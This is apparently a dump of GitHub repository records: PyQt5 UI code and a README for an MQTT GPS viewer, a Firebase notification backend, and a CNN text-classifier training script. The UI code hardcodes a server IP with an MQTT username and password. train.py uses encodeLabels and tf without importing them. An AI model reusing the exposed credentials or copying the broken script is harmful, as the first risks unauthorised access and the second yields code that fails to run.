font.setPointSize(14)\r\n self.label_21.setFont(font)\r\n self.label_21.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_21.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_21.setObjectName(\"label_21\")\r\n self.widget_2 = QtWidgets.QWidget(self.tab_4)\r\n self.widget_2.setGeometry(QtCore.QRect(640, 60, 380, 261))\r\n self.widget_2.setStyleSheet(\"background-color: rgb(245, 255, 180);\")\r\n self.widget_2.setObjectName(\"widget_2\")\r\n self.label_26 = QtWidgets.QLabel(self.widget_2)\r\n self.label_26.setGeometry(QtCore.QRect(10, 10, 361, 20))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n font.setPointSize(14)\r\n self.label_26.setFont(font)\r\n self.label_26.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_26.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_26.setObjectName(\"label_26\")\r\n self.horizontalLayoutWidget_10 = QtWidgets.QWidget(self.widget_2)\r\n self.horizontalLayoutWidget_10.setGeometry(QtCore.QRect(10, 40, 361, 221))\r\n self.horizontalLayoutWidget_10.setObjectName(\"horizontalLayoutWidget_10\")\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_10)\r\n self.horizontalLayout_6.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_6.setSpacing(6)\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n self.verticalLayout_7 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_7.setSpacing(6)\r\n self.verticalLayout_7.setObjectName(\"verticalLayout_7\")\r\n self.label_27 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_27.setFont(font)\r\n self.label_27.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_27.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_27.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_27.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_27.setObjectName(\"label_27\")\r\n self.verticalLayout_7.addWidget(self.label_27)\r\n self.label_28 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = 
QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_28.setFont(font)\r\n self.label_28.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_28.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_28.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_28.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_28.setObjectName(\"label_28\")\r\n self.verticalLayout_7.addWidget(self.label_28)\r\n self.label_29 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_29.setEnabled(True)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_29.setFont(font)\r\n self.label_29.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_29.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_29.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_29.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_29.setObjectName(\"label_29\")\r\n self.verticalLayout_7.addWidget(self.label_29)\r\n self.label_30 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_30.setFont(font)\r\n self.label_30.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_30.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_30.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_30.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_30.setObjectName(\"label_30\")\r\n self.verticalLayout_7.addWidget(self.label_30)\r\n self.label_31 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_31.setFont(font)\r\n self.label_31.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_31.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_31.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_31.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_31.setObjectName(\"label_31\")\r\n self.verticalLayout_7.addWidget(self.label_31)\r\n self.horizontalLayout_6.addLayout(self.verticalLayout_7)\r\n self.verticalLayout_8 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_8.setSpacing(6)\r\n self.verticalLayout_8.setObjectName(\"verticalLayout_8\")\r\n spacerItem12 = QtWidgets.QSpacerItem(20, 33, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem12)\r\n self.label_motor1 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor1.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor1.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor1.setText(\"\")\r\n self.label_motor1.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor1.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor1.setObjectName(\"label_motor1\")\r\n self.verticalLayout_8.addWidget(self.label_motor1)\r\n spacerItem13 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem13)\r\n self.label_motor2 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor2.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor2.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor2.setText(\"\")\r\n self.label_motor2.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor2.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor2.setObjectName(\"label_motor2\")\r\n self.verticalLayout_8.addWidget(self.label_motor2)\r\n spacerItem14 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n 
self.verticalLayout_8.addItem(spacerItem14)\r\n self.label_motor3 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor3.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor3.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor3.setText(\"\")\r\n self.label_motor3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor3.setObjectName(\"label_motor3\")\r\n self.verticalLayout_8.addWidget(self.label_motor3)\r\n spacerItem15 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem15)\r\n self.label_motor4 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor4.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor4.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor4.setText(\"\")\r\n self.label_motor4.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor4.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor4.setObjectName(\"label_motor4\")\r\n self.verticalLayout_8.addWidget(self.label_motor4)\r\n spacerItem16 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem16)\r\n self.label_motor5 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor5.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor5.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor5.setText(\"\")\r\n self.label_motor5.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor5.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor5.setObjectName(\"label_motor5\")\r\n self.verticalLayout_8.addWidget(self.label_motor5)\r\n spacerItem17 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem17)\r\n self.horizontalLayout_6.addLayout(self.verticalLayout_8)\r\n self.horizontalLayout_6.setStretch(1, 1)\r\n self.tabWidget.addTab(self.tab_4, \"\")\r\n self.tab_2 = QtWidgets.QWidget()\r\n self.tab_2.setObjectName(\"tab_2\")\r\n self.tabWidget.addTab(self.tab_2, \"\")\r\n MainWindow.setCentralWidget(self.centralWidget)\r\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\r\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 1120, 23))\r\n self.menuBar.setObjectName(\"menuBar\")\r\n MainWindow.setMenuBar(self.menuBar)\r\n\r\n self.retranslateUi(MainWindow)\r\n self.tabWidget.setCurrentIndex(1)\r\n self.pushButton_start.clicked.connect(self.Start)\r\n self.pushButton_stop.clicked.connect(self.Stop)\r\n self.pushButton_reset.clicked.connect(self.Reset)\r\n self.pushButton_clear.clicked.connect(self.Clear)\r\n self.pushButton_submit.clicked.connect(self.Subs)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"GPS Map\"))\r\n self.label_11.setText(_translate(\"MainWindow\", \"Topic\"))\r\n self.lineEdit_topic.setText(_translate(\"MainWindow\", \"/CC3200@SHIP/2/SHIPDATA/SENSORDATA\"))\r\n self.lineEdit_topic.setPlaceholderText(_translate(\"MainWindow\", \"订阅主题\"))\r\n self.pushButton_submit.setText(_translate(\"MainWindow\", \"Submit\"))\r\n self.label_12.setText(_translate(\"MainWindow\", \"Host\"))\r\n self.lineEdit_host.setText(_translate(\"MainWindow\", \"139.199.208.33\"))\r\n self.lineEdit_host.setPlaceholderText(_translate(\"MainWindow\", \"服务器IP\"))\r\n 
self.label_13.setText(_translate(\"MainWindow\", \"Port\"))\r\n self.lineEdit_port.setText(_translate(\"MainWindow\", \"1883\"))\r\n self.lineEdit_port.setPlaceholderText(_translate(\"MainWindow\", \"端口\"))\r\n self.label_14.setText(_translate(\"MainWindow\", \"Username\"))\r\n self.lineEdit_username.setText(_translate(\"MainWindow\", \"cehang\"))\r\n self.lineEdit_username.setPlaceholderText(_translate(\"MainWindow\", \"用户名\"))\r\n self.label_15.setText(_translate(\"MainWindow\", \"Password\"))\r\n self.lineEdit_password.setText(_translate(\"MainWindow\", \"cehang001\"))\r\n self.lineEdit_password.setPlaceholderText(_translate(\"MainWindow\", \"密码\"))\r\n self.label_16.setText(_translate(\"MainWindow\", \"CliendID\"))\r\n self.lineEdit_clientid.setText(_translate(\"MainWindow\", \"SXF_Python_Map\"))\r\n self.lineEdit_clientid.setPlaceholderText(_translate(\"MainWindow\", \"连接ID\"))\r\n self.label_17.setText(_translate(\"MainWindow\", \"HeartBeat\"))\r\n self.lineEdit_heartbeat.setText(_translate(\"MainWindow\", \"60\"))\r\n self.lineEdit_heartbeat.setPlaceholderText(_translate(\"MainWindow\", \"心跳\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \" 连接 \"))\r\n self.label_10.setText(_translate(\"MainWindow\", \"Receive Topic\"))\r\n self.label_img.setText(_translate(\"MainWindow\", \"GPS Map Here\"))\r\n self.label.setText(_translate(\"MainWindow\", \"状态\"))\r\n self.label_2.setText(_translate(\"MainWindow\", \"模式\"))\r\n self.label_3.setText(_translate(\"MainWindow\", \"时间\"))\r\n self.label_4.setText(_translate(\"MainWindow\", \"纬度\"))\r\n self.label_5.setText(_translate(\"MainWindow\", \"经度\"))\r\n self.label_6.setText(_translate(\"MainWindow\", \"速率\"))\r\n self.label_7.setText(_translate(\"MainWindow\", \"航向\"))\r\n self.label_8.setText(_translate(\"MainWindow\", \"磁偏\"))\r\n self.label_9.setText(_translate(\"MainWindow\", \"偏向\"))\r\n self.label_status.setText(_translate(\"MainWindow\", \"A有效;V无效\"))\r\n self.label_mode.setText(_translate(\"MainWindow\", \"A自主;D差分;E估算; N无效\"))\r\n self.label_time.setText(_translate(\"MainWindow\", \"年/月/日 时:分:秒\"))\r\n self.label_lat.setText(_translate(\"MainWindow\", \"N北纬;S南纬\"))\r\n self.label_lon.setText(_translate(\"MainWindow\", \"E东经;W西经\"))\r\n self.label_speed.setText(_translate(\"MainWindow\", \"公里/小时\"))\r\n self.label_course.setText(_translate(\"MainWindow\", \"0~359.9°\"))\r\n self.label_declination.setText(_translate(\"MainWindow\", \"0~180.0°\"))\r\n self.label_declination_dir.setText(_translate(\"MainWindow\", \"E东;W西\"))\r\n self.pushButton_reset.setText(_translate(\"MainWindow\", \"Reset\"))\r\n self.pushButton_start.setText(_translate(\"MainWindow\", \"Start\"))\r\n self.pushButton_stop.setText(_translate(\"MainWindow\", \"Stop\"))\r\n self.label_debug.setText(_translate(\"MainWindow\", \"DeBug Here\"))\r\n self.pushButton_clear.setText(_translate(\"MainWindow\", \"Clear\"))\r\n self.label_gpsupdate.setText(_translate(\"MainWindow\", \"定位未更新\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \" GPS \"))\r\n self.label_18.setText(_translate(\"MainWindow\", \"偏航角(yaw)\"))\r\n self.label_19.setText(_translate(\"MainWindow\", \"滚转角(roll)\"))\r\n self.label_20.setText(_translate(\"MainWindow\", \"俯仰角(pitch)\"))\r\n self.label_yaw.setText(_translate(\"MainWindow\", \"角度\"))\r\n self.label_yaw_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_roll.setText(_translate(\"MainWindow\", \"角度\"))\r\n 
self.label_roll_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_pitch.setText(_translate(\"MainWindow\", \"角度\"))\r\n self.label_pitch_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_21.setText(_translate(\"MainWindow\", \"MPU6050姿态传感器\"))\r\n self.label_26.setText(_translate(\"MainWindow\", \"A365电机转速\"))\r\n self.label_27.setText(_translate(\"MainWindow\", \"电机1\"))\r\n self.label_28.setText(_translate(\"MainWindow\", \"电机2\"))\r\n self.label_29.setText(_translate(\"MainWindow\", \"电机3\"))\r\n self.label_30.setText(_translate(\"MainWindow\", \"电机4\"))\r\n self.label_31.setText(_translate(\"MainWindow\", \"电机5\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_4), _translate(\"MainWindow\", \" 传感器 \"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \" 控制 \"))\r\n\r\n\r\n"
},
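The GPS tab defined above displays the classic NMEA RMC field set: status (A valid / V invalid), positioning mode, UTC time, latitude with N/S, longitude with E/W, speed, course, and magnetic declination with its direction. The project's own parser is not included in this dump, so the sketch below is a hypothetical illustration that splits a `$GPRMC` sentence according to the public NMEA 0183 layout rather than this repository's implementation.

```python
# Hypothetical RMC splitter following the public NMEA 0183 layout; the
# repository's actual parsing code is not part of this dump.
def parse_rmc(sentence):
    fields = sentence.split('*')[0].split(',')    # drop checksum, split fields
    return {
        'status': fields[2],                      # A = valid, V = invalid
        'time_utc': fields[1],                    # hhmmss.sss
        'latitude': (fields[3], fields[4]),       # value, N/S
        'longitude': (fields[5], fields[6]),      # value, E/W
        'speed_knots': fields[7],                 # the UI shows km/h after conversion
        'course_deg': fields[8],                  # 0-359.9 degrees
        'date': fields[9],                        # ddmmyy
        'declination': (fields[10], fields[11]),  # value, E/W
    }

print(parse_rmc('$GPRMC,123519,A,4807.038,N,01131.000,E,022.4,084.4,230394,003.1,W*6A'))
```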
{
"alpha_fraction": 0.7220630645751953,
"alphanum_fraction": 0.7507163286209106,
"avg_line_length": 25.538461685180664,
"blob_id": "123f96d22eb02edfdf8bd224f43e30766dacef81",
"content_id": "763eef64554442e1f565526cfdc749c5b7f88b2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 13,
"path": "/README.md",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# GPS_UpperComputer_MQTT \n【毕设内容之一】 \n \nPC上位机,可配置mqtt连接信息、解析GPS数据,并调用百度地图API显示。 \n界面用Qt12绘制,exe由pyinstaller生成。 \n\nexe文件较大,可访问链接获取: https://pan.baidu.com/s/1EU8LWXp1MicvyDC5bGWeAw 提取码: jepv \n若嫌网盘下载太慢,可自行搜索pandownload,可快速下载网盘文件。 \n\n使用时,请补全一下内容(exe文件不需添加,内已使用我的)\n1. USERNAME = \"\"\n2. PASSWORD = \"\"\n3. def gps2baidu(self, longitude, latitude)中的ak\n\n\n\n\n"
}
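The README's third checklist item refers to the `ak` (Baidu Maps API key) used inside `gps2baidu`. The repository's implementation is not shown here, but a plausible minimal sketch, assuming Baidu's public geoconv v1 endpoint for converting raw WGS-84 GPS coordinates to Baidu's BD-09 system, could look like this (`YOUR_AK` is a placeholder):

```python
import requests

# Minimal sketch of a gps2baidu-style conversion; endpoint and parameters
# follow Baidu's public geoconv v1 API, and YOUR_AK is a placeholder key.
def gps2baidu(longitude, latitude, ak='YOUR_AK'):
    resp = requests.get('https://api.map.baidu.com/geoconv/v1/',
                        params={'coords': '{},{}'.format(longitude, latitude),
                                'from': 1,  # 1 = WGS-84 (raw GPS)
                                'to': 5,    # 5 = BD-09 (Baidu map grid)
                                'ak': ak})
    point = resp.json()['result'][0]
    return point['x'], point['y']  # Baidu longitude, latitude
```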
] | 4 |
bradley101/blackpearl-backend
|
https://github.com/bradley101/blackpearl-backend
|
2498998d1ca018056dfb204ae7edfc927addf326
|
21934246e9d06b84e60af8ad0a527dade9690f62
|
c6227c63e92e0d92c17c7f28a05d2d5e1d52aca8
|
refs/heads/master
| 2023-08-23T20:13:34.799524 | 2021-10-18T19:24:52 | 2021-10-18T19:24:52 | 418,634,036 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.599645733833313,
"alphanum_fraction": 0.6200177073478699,
"avg_line_length": 28.6842098236084,
"blob_id": "db70379f11dda1feb1f36d4d4eef020dc75d4a0a",
"content_id": "f4a496ab09ae489221f262ccf937d64fc16b2368",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 38,
"path": "/db_helper.py",
"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "'''\n Please run\n python -m pip install requests\n before using this\n\n runs on python 2.x\n\n usage:\n Call sendNotification() with the params to save the notification in \n the database and send notification to the devices\n'''\nimport requests, json\n\ndef format_to_unicode(d):\n return u'{}'.format(d)\n\nftu = format_to_unicode\n\nnotification_server = 'http://localhost:3443'\n\ndef sendNotification(strMsg, strSeverity, strAutoInductId, numTimestamp):\n try:\n r = requests.post('{}/notify'.format(notification_server), json={\n ftu(\"message\"): ftu(strMsg),\n ftu(\"severity\"): ftu(strSeverity),\n ftu(\"timestamp\"): numTimestamp,\n ftu(\"inductId\"): ftu(strAutoInductId)\n })\n if r.status_code == 200:\n print (r.status_code, \"Notification send to devices\")\n else:\n print(r.status_code, r.reason)\n except Exception as e1:\n print (\"Exception occurred - \", e1)\n\nif __name__ == \"__main__\":\n test_notification = [\"Important and Complex msg\", \"1\", \"490\", 565465456]\n sendNotification(*test_notification)\n\n"
},
{
"alpha_fraction": 0.6982758641242981,
"alphanum_fraction": 0.7396551966667175,
"avg_line_length": 23.16666603088379,
"blob_id": "37b856883d6ba21872820e8d2cf91909c6bb31cf",
"content_id": "df06b238074672a0c46901cd1aa3ef61e449fc78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 24,
"path": "/README.md",
"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "### Steps to run blackpearl-backend\n```\ngit clone https://github.com/bradley101/blackpearl-backend.git\ncd blackpearl-backend\n\n# Copy your firebase config file to the working directory\ncp ~/config.json .\n\nnpm i\nnpm run main\n```\n\nNow `POST /notify` to `http://localhost:3443` with the data params.\n\nOr \n\nImport `db_helper.py` into your Python 2.x working directory (Install `requests` module first - `python -m install requests`)\n```\nfrom db_helper import sendNotification\n\nsendNotification(\"Some msg\", \"1\", 89987532343223, \"4\")\n```\n\nThe notification will be sent to the app users.\n"
},
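For clients that do not use the helper script, the `/notify` endpoint can also be hit directly; the payload keys below are exactly the ones `index.js` validates before persisting. A minimal sketch using `requests`:

```python
import requests

# Direct POST to the notification endpoint; the field names mirror the
# checks performed by persist() in index.js.
payload = {
    "message": "Some msg",
    "severity": "1",
    "inductId": "4",
    "timestamp": 89987532343223,
}
r = requests.post("http://localhost:3443/notify", json=payload)
print(r.status_code, r.text)
```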
{
"alpha_fraction": 0.5796344876289368,
"alphanum_fraction": 0.5926892757415771,
"avg_line_length": 24.55555534362793,
"blob_id": "c36c8f484370f74160a5dc851438c6e516d34680",
"content_id": "2e17e3dac0fc3e9cf5d854c4a375470d639325bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1149,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 45,
"path": "/index.js",
"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "let admin = require('firebase-admin')\nconst { getFirestore, Timestamp, FieldValue } = require('firebase-admin/firestore');\nconst express = require('express');\nconst app = express();\n\nvar serviceAccount = require(\"./config.json\");\nadmin.initializeApp({\n credential: admin.credential.cert(serviceAccount),\n databaseURL: \"https://blackpearl-10.firebaseio.com\"\n});\n\nlet db = getFirestore();\napp.use(express.json());\napp.get('/', async (req, res) => {\n res.status(200).send(\"Done!\");\n});\n\nlet fcm = admin.messaging();\n\nlet persist = async data => {\n if (data.message && data.inductId && data.timestamp && data.severity) {\n await db.collection('test-collection').add(data);\n await fcm.sendToTopic(\"notify\", {\n data: {\n data: JSON.stringify(data)\n }\n });\n console.log('Sent to topic');\n }\n};\n\napp.post('/notify', async (req, res) => {\n try {\n data = req.body;\n console.log(data);\n persist(data);\n res.status(200).send({\"msg\": \"Sent successfully.\"});\n } catch (error) {\n res.status(500).send(error)\n }\n \n \n})\n\napp.listen(3443);"
}
] | 3 |
oscar-defelice/TextClassifierModels
|
https://github.com/oscar-defelice/TextClassifierModels
|
df0124c97618f0da4981cdf597850de48d72d148
|
90fc12acee4a320a55b5d25cca119495733a5b6f
|
e958198efdb5d603876e9cafd91d31885eda360a
|
refs/heads/main
| 2023-01-12T23:53:13.267350 | 2020-11-17T09:51:30 | 2020-11-17T09:51:30 | 305,735,677 | 2 | 0 |
Apache-2.0
| 2020-10-20T14:30:54 | 2020-11-07T11:18:07 | 2020-11-17T09:51:31 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.6909279823303223,
"alphanum_fraction": 0.6961268782615662,
"avg_line_length": 33.97272872924805,
"blob_id": "267d8817283f7ba7c941f901a293c33050aa6e15",
"content_id": "76945682bb4bed4558fa4bbee626f07e441a9dd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3848,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 110,
"path": "/CNN/train.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### train.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### train.py\n### This module contains the script to train the model via CLI.\n\"\"\"\n To train the model this type in a command line prompt\n the command\n\n python3 -m train [-h] [-c CONFIG]\n\n where CONFIG is the yaml file path containing configuration variables.\n\"\"\"\n\nimport argparse\nfrom model import buildModel\nfrom utils import getTokeniser, loadConfig, loadData, splitData, tokenise, printReport\n\n# let user feed in 1 parameter, the configuration file\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', '--config', type=str, dest='config',\n help='path of the configuration file')\nargs = parser.parse_args()\nconfigFile = args.config\n\n## load configuration and store it in a dictionary\nconfig = loadConfig(configFile)\n\n## variables\n# path of csv file containing data\ninput_data = config['dataset']['file']['path']\n# split mode (random or fixed) and value (test_rate or validation column in df)\nsplit_mode = config['trn_val_splits']['type']\nsplit_value = config['trn_val_splits']['value']\n# random state seed for pseudorandom processes\nrandom_state = config['random_state']\n# name of the column containing text data\ntext_col = config['input_features']['text']\n# name of the column containing labels\nlabels = config['input_features']['labels']\n# tokeniser object\ntokeniser_conf = config['tokeniser']['tokeniser']\ntokeniser = getTokeniser(tokeniser_conf)\n# max sequence length\nmax_len = config['tokeniser']['max_seq_length']\n# pad to max_seq_length\npad = config['tokeniser']['pad']\n# embedding dimension\nembedding_dim = config['module']['embedding_dim']\n# dropout rate\ndropout_rate = config['module']['dropout_rate']\n# batch size\nbatch_size = config['training']['batch_size']\n# number of epochs\nn_epochs = config['training']['epochs']\n# learning rate\nlearning_rate = config['training']['lr']\n# output file for the report\noutfile = config['output']['path']\n\n\n## load data\ndf, n_classes = loadData(input_data, labels)\n\n## train, test split\ndf_train, df_test = splitData(df, split_mode, split_value, random_state)\n\n## text-to-sequence encoding\nX_train, vocab_size = tokenise(tokeniser, df_train, text_col, max_len,\n padding = pad, mode = 'train')\nX_test = tokenise(tokeniser, df_test, text_col, max_len, padding = pad,\n mode = 'test')\n\n## convert labels to one-hot encoder\ny_train = encodeLabels(df_train, labels)\ny_test = encodeLabels(df_test, labels)\n\n## convert to tensorflow datasets\ntrain_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))\ntest_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test))\nds_train = train_dataset.shuffle(10000).batch(batch_size)\nds_test 
= test_dataset.batch(batch_size)\n\n\n## define deep learning model calssifier\nmodel = buildModel(vocab_size, embedding_dim, max_len, n_classes, dropout_rate)\n\n## train the model\nmodel.fit(ds_train, epochs=n_epochs, validation_data=ds_test)\n\nprintReport(model, X_test, y_test, target_names = df[labels].unique(),\n outfile=outfile)\n"
},
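Since `train.py` is driven entirely by the configuration file, it helps to see the shape `loadConfig` is expected to return. The keys below are exactly the ones the script reads; the values are illustrative placeholders, not the project's shipped settings:

```python
# Illustrative configuration mirroring every key train.py reads; the values
# (paths and hyperparameters) are placeholders, not the project's own.
config = {
    'dataset': {'file': {'path': 'data/ag_news.csv'}},
    'trn_val_splits': {'type': 'random', 'value': 0.2},
    'random_state': 42,
    'input_features': {'text': 'text', 'labels': 'label'},
    'tokeniser': {'tokeniser': 'keras', 'max_seq_length': 100, 'pad': True},
    'module': {'embedding_dim': 128, 'dropout_rate': 0.2},
    'training': {'batch_size': 32, 'epochs': 5, 'lr': 1e-3},
    'output': {'path': 'reports/report-'},
}
```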
{
"alpha_fraction": 0.5976260900497437,
"alphanum_fraction": 0.6068249344825745,
"avg_line_length": 53.35483932495117,
"blob_id": "d62f680f7359c8b95d0faba38009d8e43d33bc94",
"content_id": "a63d8ee6d48629e3bb7a61260d9f97380ebfccbf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3370,
"license_type": "permissive",
"max_line_length": 279,
"num_lines": 62,
"path": "/README.md",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "# TextClassifierModels\nRepository containing the code to develop a Neural based text classifier.\n\n## Models\n\nIn the repository there are various models implemented for text classification.\nIn order to access a _ready-to-explore_ version one can have a look at the notebooks provided.\nModels are quite heavy and memory consuming, so it is really advised to use a GPU machine to run their training tasks.\n\n### Available models\n\n\n<table style=\"max-width:100%;table-layout:auto;\">\n <tr style=\"text-align:center;\">\n <th>Model</th>\n <th>Demo</th>\n <th>Details</th>\n <th>CLI</th>\n <th>Accuracy score on AG news dataset</th>\n </tr>\n <!-- -->\n <!-- -->\n <!-- ** CNN TextClassifier -->\n <tr>\n <!-- Model -->\n <td rowspan=\"3\"><b><a style=\"white-space:nowrap; display:inline-block;\" href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/CNN\"><div style='vertical-align:middle; display:inline;'>CNN TextClassifier</div></a></b></td>\n <!-- Colab badge -->\n <td><a href=\"https://colab.research.google.com/drive/1nh9QvDu3YgceQ2PH5DZz3pnYbGljtpIF?usp=sharing\">\n <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a></td>\n <!-- Description -->\n <td rowspan=\"3\">Classify texts with labels from the <a href=\"http://groups.di.unipi.it/~gulli/AG_corpus_of_news_articles.html\">AG news database</a> making use of a convolutional neural network.</td>\n <!-- Command Line key -->\n <td rowspan=\"3\"><code>python3 -m train -c config.yaml</code></td>\n <td rowspan=\"3\"> 90.71 </td>\n </tr>\n <tr>\n <!-- ** WebApp Link -->\n <td><a 